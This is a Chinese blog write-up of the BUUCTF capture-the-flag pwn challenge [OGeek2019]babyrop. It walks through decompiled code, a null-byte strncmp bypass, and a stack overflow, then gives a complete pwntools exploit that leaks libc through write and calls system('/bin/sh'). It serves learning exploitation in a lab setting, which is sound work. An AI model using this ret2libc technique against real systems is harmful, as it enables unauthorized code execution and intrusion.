[OGeek2019]babyrop

最新推荐文章于 2023-04-02 16:58:08 发布
最新推荐文章于 2023-04-02 16:58:08 发布
阅读量213 收藏
点赞数
分类专栏: buuctf 笔记 ctf 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zip471642048/article/details/125406142
版权
笔记 同时被 3 个专栏收录
113 篇文章 5 订阅
订阅专栏
ctf
107 篇文章 4 订阅
订阅专栏
buuctf
39 篇文章 0 订阅
订阅专栏

[OGeek2019]babyrop

在这里插入图片描述
checksec 32位程序,其他开了问题不大
在这里插入图片描述

main函数

在这里插入图片描述

int __cdecl main()
{
  int buf; // [esp+4h] [ebp-14h]
  char v2; // [esp+Bh] [ebp-Dh]
  int fd; // [esp+Ch] [ebp-Ch]

  f1();
  fd = open("/dev/urandom", 0); #读一个随机数
  if ( fd > 0 ) #判断随机数是否大于0
    read(fd, &buf, 4u);# 把fd写4个bit到&buf 
  v2 = f2(buf); # v2 等于f2的返回值
  f3(v2); 
  return 0;
}

f1函数 初始化操作,就是清空缓冲区,没什么好讲的

在这里插入图片描述

f2函数

f2的利用点在于read函数会读入0x20个字符串,但是buf只有8大小,但是buf离ebp距离是0x2c,远远达不到覆盖return
addr 的目的,不过f2函数会返回一个值v5给 f3作为参数,strncmp
可以用\x00绕过,在f3中v5的长度只要不等于127就可以完成任意长度的溢出

在这里插入图片描述

int __cdecl sub_804871F(int a1)
{
  size_t v1; // eax
  char s; // [esp+Ch] [ebp-4Ch]
  char buf[7]; // [esp+2Ch] [ebp-2Ch]
  unsigned __int8 v5; // [esp+33h] [ebp-25h]
  ssize_t v6; // [esp+4Ch] [ebp-Ch]

  memset(&s, 0, 0x20u);
  memset(buf, 0, 0x20u);
  sprintf(&s, "%ld", a1); #把a1读给 s
  v6 = read(0, buf, 0x20u);# 从终端读取0x20个字符串到buf
  buf[v6 - 1] = 0;
  v1 = strlen(buf); # buf的长度
  if ( strncmp(buf, &s, v1) ) #比较 buf 和 s 比较数是v1也就是buf的长度
    exit(0);
  write(1, "Correct\n", 8u);
  return v5;
}

f3函数

我们可以看到关键的利用点在f3上,f3 的else语句,read读入的是a1的值,a1的值是f2的返回值也就是v5,我们在f2函数中可以通过覆盖来控制v5的值,至此rop链已经构造完成
在这里插入图片描述

ssize_t __cdecl sub_80487D0(char a1)
{
  ssize_t result; // eax
  char buf; // [esp+11h] [ebp-E7h]

  if ( a1 == 127 ) #如果a1等于127 就读入0xc8个字符串
    result = read(0, &buf, 0xC8u);
  else # 如果a1不等于127就读入a1长度的字符串
    result = read(0, &buf, a1);
  return result;
}

exp

from pwn import *

io = process("./pwn")
io = remote("node4.buuoj.cn",26505)
elf = ELF("./pwn")
libc = ELF("libc-2.23.so")

context(log_level="debug",arch="i386")

write_plt = elf.plt["write"]
read_got = elf.got["read"]
main_func = 0x08048825

payload1 = "\x00" + "\xff"*7

io.sendline(payload1)
io.recvline()
payload2 = flat(["a"*0xE7,"b"*4,write_plt,main_func,1,read_got,0x8])

io.sendline(payload2)

read_addr = u32(io.recv(4))
print read_addr

libcbase = read_addr - libc.symbols["read"]
#print libcbase
system_addr = libcbase + libc.symbols["system"]
binsh = libcbase + next(libc.search("/bin/sh"))
print binsh
payload3 = flat(["a"*0xe7,"b"*4,system_addr,0,binsh])

io.sendline(payload1)
io.recvline()
io.sendline(payload3)

io.interactive()

在这里插入图片描述

[mzq]
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OGeek2019bayrop
m0_62322730的博客
05-06 358
OGeek2019bayrop
[OGeek2019]babyrop[BUUCTF]
最新发布
moonlightsunshin的博客
05-06 365
首先我们要确保strncmp=0保证程序不退出,直接让v1=0strncmp就会为0strncmp用来获取长度当读到"\0"会自动赋0所以我们让buf[0]="\x00"没有/bin/sh和system加上题目这道题的思路就是利用write泄露出libc的地址来进行ROP。buf长度只需0xe7+4就可以溢出。32位开了NX,地址随机化基本排除shellcode的可能。write也是libc库中的标准函数。shift+f12看字符串。
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3673
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTF上pwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 420
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
BUUCTF pwn——[OGeek2019]babyrop
CNS-Enterprise BCC-1701-J
04-02 241
BUUCTF 做题练习
天池OGeek算法挑战赛数据.zip
12-21
标题中的“天池OGeek算法挑战赛数据.zip”表明这是一个与阿里巴巴天池平台上的OGeek算法竞赛相关的数据集。天池是阿里云主办的一个数据科学和机器学习竞赛平台,旨在促进数据科学的发展和应用,挑战赛通常涉及到各种...
OGeek
03-19
lgb 代码入口:sh base_run.sh。 写了很多冗余特征,跑起来非常慢,需要做一下特征选择。 线上提交后0.7154。 代码中用到了分词和词向量,需要将切词的代码换成自己的切词代码,需要自己提供词向量。...
TianChi_OGeek
03-19
"TianChi_OGeek"很可能是一个与数据分析或机器学习相关的项目,参与者需要解决特定的数据问题并提交解决方案。在这个项目中,我们遇到了一个具体的问题,即在训练数据集(train)的第1815102行存在一个遗漏的引号,这...
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
OGeek-数据集
03-30
标题中的“OGeek-数据集”表明这是一个与OGeek相关的数据集合,可能是用于机器学习、数据分析或人工智能项目的训练和评估数据。OGeek可能是一个竞赛平台、研究项目或者是一个专注于数据科学的社区。 描述中只提到...
OGeek:基准线
03-19
"OGeek:基准线"项目是一个基于Python的性能基准测试平台,用于衡量和比较不同算法或代码片段的效率。这个项目的初次提交在线上评测中取得了0.6643的评分,排名为第18位,后续的开发中可能会不断优化思路和策略。 在...
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1235
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
ctf【[OGeek2019]babyrop
HUANGliang_的博客
10-29 248
(1)用0x00绕过strncmp比较 (2)进入sub_80487D0函数进行第二次输入,因为buf有0xe7字节,因此0xc8是不够输入的,为使得多输入一些字符可以将a1写为0xff (3)泄漏read的got地址,求得偏移量,通过溢出执行write函数,打印出read的got地址,并在此之后重新执行sub_80487D0函数 (4)根据得到的read的got地址求偏移量,计算出system函数地址和"\bin\sh"的地址,实施漏洞攻击,夺取权限
Buuctf(pwn)[OGeek2019]babyrop
半岛铁盒的博客
03-25 665
发现第二个函数有个read函数,但它是0x20是不能够构成漏洞利用,只是利用它作为中间的一个简单的输出即可; 跳过if判定: 只需在第一次输入时 在最前面加上 ‘\0’ a1上上一次返回的 buf[7] 这里的漏洞点利用, 要保证 a1的值尽可能的大, 这里选择的是 ‘xff’ – 255 该题目已经为我们提供了Libc Exp可以这样写 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23....
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8352
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值